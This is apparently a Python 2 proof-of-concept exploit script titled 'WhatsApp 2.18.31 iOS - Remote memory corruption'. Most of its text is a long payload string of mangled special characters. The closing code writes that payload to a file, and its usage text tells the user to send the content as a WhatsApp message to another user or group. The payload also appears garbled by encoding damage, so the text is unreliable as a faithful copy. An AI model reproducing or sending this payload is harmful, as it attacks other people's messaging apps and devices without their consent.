aC/!aC/C/aC/PSaC/$?aC/Y=aC/|aC/SSaC/"aC/(c)aC/aaC/<<aC/!aC/aC/(r)aC/-aC/degaC/+-aC/2aC/3aC/'aC/uaC/PaC/*aC/,aC/1aC/oaC/>>aC/1/4aC/1/2aC/3/4aC/?aPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPSaPS aPS!aPSC/aPSPSaPS$?aPSY=aPS|aPSSSaPS"aPS(c)aPSaaPS<<aPS!aPSaPS(r)aPS-aPSdegaPS+-aPS2aPS3aPS'aPSuaPSPaPS*aPS,aPS1aPSoaPS>>aPS1/4aPS1/2aPS3/4aPS?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$?a$? a$?!a$?C/a$?PSa$?$?a$?Y=a$?|a$?SSa$?"a$?(c)a$?aa$?<<a$?!a$?a$?(r)a$?-a$?dega$?+-a$?2a$?3a$?'a$?ua$?Pa$?*a$?,a$?1a$?oa$?>>a$?1/4a$?1/2a$?3/4a$??aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY=aY= aY=!aY=C/aY=PSaY=$?aY=Y=aY=|aY=SSaY="aY=(c)aY=aaY=<<aY=!aY=aY=(r)aY=-aY=degaY=+-aY=2aY=3aY='aY=uaY=PaY=*aY=,aY=1aY=oaY=>>aY=1/4aY=1/2aY=3/4aY=?a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a|a| a|!a|C/a|PSa|$?a|Y=a||a|SSa|"a|(c)a|aa|<<a|!a|a|(r)a|-a|dega|+-a|2a|3a|'a|ua|Pa|*a|,a|1a|oa|>>a|1/4a|1/2a|3/4a|?aSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSSaSS aSS!aSSC/aSSPSaSS$?aSSY=aSS|aSSSSaSS"aSS(c)aSSaaSS<<aSS!aSSaSS(r)aSS-aSSdegaSS+-aSS2aSS3aSS'aSSuaSSPaSS*aSS,aSS1aSSoaSS>>aSS1/4aSS1/2aSS3/4aSS?a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a"a" a"!a"C/a"PSa"$?a"Y=a"|a"SSa""a"(c)a"aa"<<a"!a"a"(r)a"-a"dega"+-a"2a"3a"'a"ua"Pa"*a",a"1a"oa">>a"1/4a"1/2a"3/4a"?a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c)a(c) a(c)!a(c)C/a(c)PSa(c)$?a(c)Y=a(c)|a(c)SSa(c)"a(c)(c)a(c)aa(c)<<a(c)!a(c)a(c)(r)a(c)-a(c)dega(c)+-a(c)2a(c)3a(c)'a(c)ua(c)Pa(c)*a(c),a(c)1a(c)oa(c)>>a(c)1/4a(c)1/2a(c)3/4a(c)?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa!aaC/aaPSaa$?aaY=aa|aaSSaa"aa(c)aaaaa<<aa!aaaa(r)aa-aadegaa+-aa2aa3aa'aauaaPaa*aa,aa1aaoaa>>aa1/4aa1/2aa3/4aa?a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<<a<< a<<!a<<C/a<<PSa<<$?a<<Y=a<<|a<<SSa<<"a<<(c)a<<aa<<<<a<<!a<<a<<(r)a<<-a<<dega<<+-a<<2a<<3a<<'a<<ua<<Pa<<*a<<,a<<1a<<oa<<>>a<<1/4a<<1/2a<<3/4a<<?a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a!a! a!!a!C/a!PSa!$?a!Y=a!|a!SSa!"a!(c)a!aa!<<a!!a!a!(r)a!-a!dega!+-a!2a!3a!'a!ua!Pa!*a!,a!1a!oa!>>a!1/4a!1/2a!3/4a!?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa a!aC/aPSa$?aY=a|aSSa"a(c)aaa<<a!aa(r)a-adega+-a2a3aPa*a,a1aoa>>a1/4a1/2a3/4a?a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r)a(r) a(r)!a(r)C/a(r)PSa(r)$?a(r)Y=a(r)|a(r)SSa(r)"a(r)(c)a(r)aa(r)<<a(r)!a(r)a(r)(r)a(r)-a(r)dega(r)+-a(r)2a(r)3a(r)'a(r)ua(r)Pa(r)*a(r),a(r)1a(r)1/2a(r)3/4a(r)?a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-a-!a-a-(r)a--adegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadegadeg adeg!adegC/adegPSadeg$?adegY=adeg|adegSSadeg"adeg(c)adegaadeg<<adeg!adegadeg(r)adegdegadeg+-adeg2adeg3adeg'adeguadegPadeg*adeg,adeg1adegoadeg>>adeg1/4adeg1/2adeg3/4adeg?a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+-a+- a+-!a+-C/a+-PSa+-$?a+-Y=a+-|a+-SSa+-"a+-(c)a+-aa+-<<a+-!a+-a+-(r)a+--a+-dega+-+-a+-2a+-3a+-'a+-ua+-Pa+-*a+-,a+-1a+-o' sutf8 = payload.encode('UTF-8') finalPoC = payload*6 print "[*] Writing to file: " + filename open(filename, 'w').write("\n".join(payload)) print "[*] Done." def howtouse(): print "Usage: whatsapp.py [FILENAME]" print "[*] Mandatory arguments:" print "[-] FILENAME" sys.exit(-1) if __name__ == "__main__": try: print "[*] WhatsApp 2.18.31 iOS - Remote memory corruption" print "[*] Author: jsacco@exploitpack.com - http://exploitpack.com" print "[*] How to use: Copy the content of the file and send it as a message to another whatsapp user or group" whatsapp(sys.argv[1]) except IndexError: howtouse()